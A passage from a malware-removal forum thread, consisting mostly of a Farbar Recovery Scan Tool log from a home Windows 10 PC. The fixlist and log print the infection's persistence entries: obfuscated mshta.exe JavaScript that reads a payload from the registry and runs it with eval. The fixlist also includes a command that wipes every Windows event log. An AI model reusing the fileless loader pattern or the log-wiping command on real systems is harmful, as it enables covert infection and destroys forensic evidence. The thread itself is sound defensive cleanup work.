Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\3befe: "C:\WINDOWS\system32\mshta.exe" "javascript:xo1HK5M="i2z";l7I2=new ActiveXObject("WScript.Shell");kB7uBa3="b4Nsza";J3iVy2=l7I2.RegRead("HKCU\\software\\fnbc\\szon");PI7TM6="I1PHTLV";eval(J3iVy2);gh4Qj0c="DT5h";" <===== ATTENTION
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\e30a8741: "C:\WINDOWS\system32\mshta.exe" "javascript:YgjdAp2="tW";F5b=new ActiveXObject("WScript.Shell");yCFFDJ5i="c";a6wXv2=F5b.RegRead("HKCU\\software\\ycqzblx\\isbkuu");XgoRnR5L7="BEfn";eval(a6wXv2);TXVMr6="W2";" <===== ATTENTION
C:\Users\Dorraine\AppData\Local\360fd
C:\Users\Dorraine\AppData\Local\7df78865
CMD: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

 


  • 0

#5
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

That is just the fixlist I gave you.  You need to run FRST again and press the Fix button.  (The fixlist needs to be int he same folder as FRST)


  • 0

#6
preacherswife

preacherswife

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 193 posts

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 12-01-2017
Ran by Dorraine (administrator) on DORRAINE-PC (13-01-2017 20:30:42)
Running from C:\Users\Dorraine\Downloads
Loaded Profiles: Dorraine & DefaultAppPool (Available Profiles: Dorraine & DefaultAppPool)
Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Microsoft Corporation) C:\Windows\System32\DataExchangeHost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\inetsrv\w3wp.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.10.145.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-26] (Microsoft Corporation)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [26287016 2017-01-05] (Dropbox, Inc.)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2001920 2014-04-04] (AimerSoft)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7943072 2016-08-06] (SUPERAntiSpyware)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [Spotify Web Helper] => C:\Users\Dorraine\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1525360 2016-05-15] (Spotify Ltd)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*ysrtifhuy<*>] => "C:\Users\Dorraine\AppData\Local\360fd\41727.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Run: [*iznt<*>] => "C:\Users\Dorraine\AppData\Local\7df78865\5fdf41a0.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\RunOnce: [Uninstall C:\Users\Dorraine\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Dorraine\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64"
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\Hearts.scr [679936 2016-01-25] (ScreenTime Media)
HKU\S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2016-07-16] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk [2016-06-04]
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\14d3a.lnk [2017-01-13]
ShortcutTarget: 14d3a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2a0f0a9d.lnk [2017-01-13]
ShortcutTarget: 2a0f0a9d.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8a6b2.lnk [2016-09-26]
ShortcutTarget: 8a6b2.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f943f.lnk [2016-10-11]
ShortcutTarget: f943f.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{b9a91879-cca5-4abf-b5c9-de12170b6992}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl

FireFox:
========
FF ProfilePath: C:\Users\Dorraine\AppData\Roaming\Mozilla\Firefox\Profiles\a5d36r4c.default-1474997185436 [2017-01-13]
FF Homepage: Mozilla\Firefox\Profiles\a5d36r4c.default-1474997185436 -> hxxp://my.xfinity.com/
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_194.dll [2017-01-11] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_194.dll [2017-01-11] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)

Chrome:
=======
CHR Profile: C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default [2016-09-27]
CHR Extension: (Google Slides) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-09-29]
CHR Extension: (Google Docs) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-09-29]
CHR Extension: (Google Drive) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-27]
CHR Extension: (YouTube) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-29]
CHR Extension: (Google Search) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-09-29]
CHR Extension: (Google Sheets) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-09-29]
CHR Extension: (Google Docs Offline) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-09-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-09-27]
CHR Extension: (Gmail) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-09-29]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [51504 2017-01-05] (Dropbox, Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [7032080 2016-05-12] (TeamViewer GmbH)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.1.6.0\WsAppService.exe [388608 2016-01-28] (Wondershare) [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 avgntflt; C:\Windows\SysWOW64\DRIVERS\avgntflt.sys [144664 2016-08-18] (Avira Operations GmbH & Co. KG)
S1 avipbb; C:\Windows\SysWOW64\DRIVERS\avipbb.sys [154392 2016-08-18] (Avira Operations GmbH & Co. KG)
S1 avkmgr; C:\Windows\SysWOW64\DRIVERS\avkmgr.sys [35488 2016-08-18] (Avira Operations GmbH & Co. KG)
R3 dot4; C:\WINDOWS\system32\DRIVERS\Dot4.sys [151968 2012-09-25] (Windows ® Win 7 DDK provider)
R3 Dot4Print; C:\WINDOWS\System32\drivers\Dot4Prt.sys [27040 2012-09-25] (Windows ® Win 7 DDK provider)
S3 k57nd; C:\WINDOWS\System32\DRIVERS\k57amd64.sys [356392 2011-10-25] (Broadcom Corporation)
R1 MpKsl6a09507e; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{4103C44F-CA46-4694-98B9-8BBA28983EE5}\MpKsl6a09507e.sys [44928 2017-01-12] (Microsoft Corporation)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S3 WsAudioDevice_383S(1); C:\WINDOWS\System32\drivers\WsAudioDevice_383S(1).sys [29288 2015-07-30] (Wondershare)
S3 dbx; system32\DRIVERS\dbx.sys [X]
U3 idsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-01-11 17:07 - 2017-01-11 17:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-01-11 14:28 - 2017-01-11 14:28 - 00006133 _____ C:\Users\Dorraine\Downloads\System Idle Process.txt
2017-01-11 14:23 - 2017-01-13 12:24 - 00001510 _____ C:\Users\Dorraine\Desktop\Process Explorer.lnk
2017-01-11 14:23 - 2017-01-11 14:25 - 02720928 _____ (Sysinternals - www.sysinternals.com) C:\Users\Dorraine\Downloads\procexp.exe
2017-01-11 14:17 - 2017-01-11 14:20 - 00041990 _____ C:\Users\Dorraine\Downloads\Addition.txt
2017-01-11 14:15 - 2017-01-13 20:33 - 00015911 _____ C:\Users\Dorraine\Downloads\FRST.txt
2017-01-11 14:09 - 2017-01-11 14:12 - 00013106 _____ C:\VEW.txt
2017-01-11 14:04 - 2017-01-11 14:12 - 00001470 _____ C:\Users\Dorraine\Desktop\VEW.lnk
2017-01-11 14:04 - 2017-01-11 14:05 - 00061440 _____ ( ) C:\Users\Dorraine\Downloads\VEW.exe
2017-01-11 12:17 - 2017-01-13 20:28 - 00000000 ____D C:\Users\Dorraine\Downloads\FRST-OlderVersion
2017-01-11 02:26 - 2017-01-11 02:26 - 20358232 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
2017-01-11 01:55 - 2017-01-11 14:14 - 00001015 _____ C:\Users\Dorraine\Desktop\FRST64.lnk
2017-01-11 01:52 - 2017-01-13 20:30 - 00000000 ____D C:\FRST
2017-01-11 01:51 - 2017-01-13 20:28 - 02419200 _____ (Farbar) C:\Users\Dorraine\Downloads\FRST64.exe
2017-01-05 19:04 - 2017-01-05 19:04 - 00051504 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
2017-01-05 18:48 - 2017-01-05 18:48 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2017-01-05 18:48 - 2017-01-05 18:48 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2017-01-05 18:48 - 2017-01-05 18:48 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2016-12-31 19:46 - 2016-12-31 19:46 - 26557621 _____ C:\Users\Dorraine\Documents\MVI_3884_x264.mp4
2016-12-31 19:38 - 2016-12-31 19:46 - 26557621 _____ C:\Users\Dorraine\Downloads\MVI_3884_x264.mp4
2016-12-31 19:33 - 2016-12-24 23:26 - 1440503384 _____ C:\Users\Dorraine\Documents\MVI_3884.MOV
2016-12-31 19:30 - 2016-12-31 18:33 - 12477637 _____ C:\Users\Dorraine\Documents\MVI_3886_x264.mp4
2016-12-31 19:30 - 2016-12-31 18:26 - 18908883 _____ C:\Users\Dorraine\Documents\MVI_3883_x264.mp4
2016-12-31 19:30 - 2016-12-31 18:19 - 14543355 _____ C:\Users\Dorraine\Documents\MVI_3885_x264.mp4
2016-12-31 19:30 - 2016-12-31 17:57 - 23483944 _____ C:\Users\Dorraine\Documents\MVI_3888_x264.mp4
2016-12-31 19:30 - 2016-12-31 17:47 - 15521466 _____ C:\Users\Dorraine\Documents\MVI_3887_x264.mp4
2016-12-31 17:35 - 2016-12-31 17:36 - 00000000 ____D C:\Users\Dorraine\AppData\Roaming\Anvsoft
2016-12-31 17:35 - 2016-12-31 17:35 - 00001272 _____ C:\Users\Dorraine\Desktop\Any Video Converter.lnk
2016-12-31 17:35 - 2016-12-31 17:35 - 00000000 ____D C:\Users\Dorraine\Documents\Any Video Converter
2016-12-31 17:33 - 2016-12-31 17:33 - 00000000 ____D C:\Program Files (x86)\Anvsoft
2016-12-31 17:29 - 2016-12-31 17:30 - 51282968 _____ C:\Users\Dorraine\Downloads\avc-free.exe
2016-12-16 15:55 - 2016-12-16 15:56 - 00000000 ____D C:\Users\Dorraine\AppData\Local\0bdc3b3d63
2016-12-16 15:23 - 2016-12-16 15:23 - 00000000 ____D C:\Users\Dorraine\AppData\Local\7df78865

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-01-13 20:14 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-01-13 20:13 - 2016-07-16 06:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-01-13 12:05 - 2016-09-26 19:47 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-01-12 21:02 - 2015-09-29 08:10 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-01-12 14:36 - 2016-10-08 16:10 - 00051443 _____ C:\Users\Dorraine\Documents\Community Chapel Baptist Church Bulletin, Page 1.odt
2017-01-11 22:40 - 2016-11-15 17:55 - 00000000 ____D C:\Users\Dorraine\AppData\LocalLow\Mozilla
2017-01-11 21:46 - 2016-06-04 16:12 - 00001706 _____ C:\Users\Dorraine\Desktop\Weather.lnk
2017-01-11 21:39 - 2016-06-04 14:53 - 00001616 _____ C:\Users\Dorraine\Desktop\Pictures.lnk
2017-01-11 21:37 - 2016-09-26 20:06 - 00004562 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2017-01-11 17:08 - 2015-10-17 21:34 - 00000000 ___RD C:\Users\Dorraine\Dropbox
2017-01-11 17:07 - 2015-10-17 20:54 - 00000000 ____D C:\Program Files (x86)\Dropbox
2017-01-11 14:12 - 2016-07-16 06:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-01-11 13:18 - 2016-09-26 19:51 - 00000000 ____D C:\Users\Dorraine
2017-01-11 13:17 - 2016-09-26 20:07 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-01-11 13:17 - 2015-09-29 08:09 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2017-01-11 13:16 - 2016-07-16 01:04 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-01-11 02:26 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-01-11 02:26 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-01-09 21:26 - 2016-06-04 17:02 - 00000887 _____ C:\Users\Dorraine\Desktop\Networdz.lnk
2017-01-03 12:28 - 2015-09-30 08:16 - 00000000 ____D C:\ProgramData\TEMP
2017-01-03 12:28 - 2015-09-30 08:16 - 00000000 ____D C:\Program Files (x86)\SpywareBlaster
2016-12-31 17:40 - 2015-09-28 14:14 - 00000000 ___RD C:\Users\Dorraine\Videos
2016-12-31 17:35 - 2016-09-26 19:51 - 00000000 ____D C:\Users\Dorraine\AppData\Roaming
2016-12-31 17:33 - 2016-07-16 01:04 - 00000000 ___RD C:\Program Files (x86)
2016-12-31 16:36 - 2016-07-16 06:45 - 00000000 ____D C:\WINDOWS\INF
2016-12-27 20:19 - 2016-06-24 10:36 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-12-24 15:02 - 2016-11-15 14:32 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-12-22 23:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\Drivers\UMDF
2016-12-21 23:57 - 2015-09-28 14:14 - 00000000 ___RD C:\Users\Dorraine\Pictures
2016-12-16 15:23 - 2015-09-28 14:14 - 00000000 ___RD C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2016-12-15 21:51 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\Microsoft.NET
2016-12-15 21:32 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\assembly
2016-12-15 11:43 - 2016-09-26 19:50 - 00524288 ___SH C:\WINDOWS\system32\config\COMPONENTS{f5b135e6-4b48-11e6-80cb-e41d2d012050}.TMContainer00000000000000000002.regtrans-ms
2016-12-14 19:19 - 2016-09-26 19:46 - 00524288 ___SH C:\WINDOWS\system32\config\DRIVERS{f5b135f1-4b48-11e6-80cb-e41d2d012050}.TMContainer00000000000000000001.regtrans-ms
2016-12-14 19:19 - 2016-09-26 19:46 - 00225032 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-12-14 19:19 - 2016-09-26 19:46 - 00065536 ___SH C:\WINDOWS\system32\config\DRIVERS{f5b135f1-4b48-11e6-80cb-e41d2d012050}.TM.blf
2016-12-14 19:18 - 2016-07-16 06:47 - 00000796 ___SH C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\SysWOW64\en-US
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\en-US
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\Boot
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppPatch
2016-12-14 19:18 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\system32\DriverStore
2016-12-14 06:06 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\rescache
2016-12-14 05:57 - 2015-09-28 15:17 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-12-14 05:55 - 2015-09-28 15:17 - 135632432 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe

==================== Files in the root of some directories =======

2016-05-17 16:14 - 2016-05-26 23:14 - 0000145 _____ () C:\Users\Dorraine\AppData\Roaming\WB.CFG
2015-10-01 15:14 - 2016-10-13 15:10 - 0013271 _____ () C:\ProgramData\hpzinstall.log
2016-05-17 14:51 - 2016-05-17 14:51 - 0000016 _____ () C:\ProgramData\mntemp
2016-05-17 14:51 - 2016-05-17 14:51 - 0004131 _____ () C:\ProgramData\rxsmznjf.zcp

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
